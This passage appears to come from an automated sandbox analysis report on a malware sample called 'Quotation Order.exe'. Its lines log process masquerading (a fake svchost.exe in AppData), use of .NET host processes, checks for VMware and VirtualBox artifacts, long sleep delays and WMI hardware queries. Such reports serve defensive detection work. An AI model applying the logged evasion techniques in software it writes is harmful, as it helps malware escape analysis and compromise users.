                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 11E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2BA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 4BA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: CC0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 27E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 26BB4BC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 26BCCBC0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 12B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2F20000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeMemory allocated: 1670000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeMemory allocated: 31A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeMemory allocated: 2FE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2DFB7D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2DFD17A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 1440000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 3250000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\Quotation Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6803Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2751Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8597
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 794
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 1269
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2907
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 4527
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 936
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7118
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2139
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4722
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 2134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 2482
                    Source: C:\Users\user\Desktop\Quotation Order.exe TID: 7476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7940Thread sleep count: 1269 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -99891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7940Thread sleep count: 2907 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -99766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -99651s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -99531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -99422s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -99141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -99031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -98916s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -96602s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -96485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -96326s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -96157s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -96000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -95891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -95767s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -95649s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -95531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -95418s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -95297s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020Thread sleep time: -95188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -21213755684765971s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4656Thread sleep count: 4527 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99671s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -99123s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98997s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98651s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4656Thread sleep count: 936 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98317s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -98078s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97625s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97515s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97405s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97296s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888Thread sleep time: -97076s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2092Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4232Thread sleep count: 2388 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99868s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99730s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4232Thread sleep count: 2139 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99244s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99137s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -99017s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98658s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98422s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98298s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -98047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -97938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -97813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -97704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -97579s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -97454s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -97329s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe TID: 4200Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2732Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6368Thread sleep count: 2134 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99884s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99778s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6368Thread sleep count: 2482 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99553s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99422s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99313s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -99063s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98335s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -98110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -97985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -97860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -97735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -97610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -97485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -97360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99651
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98916
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96602
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96326
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96157
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95767
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95649
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95297
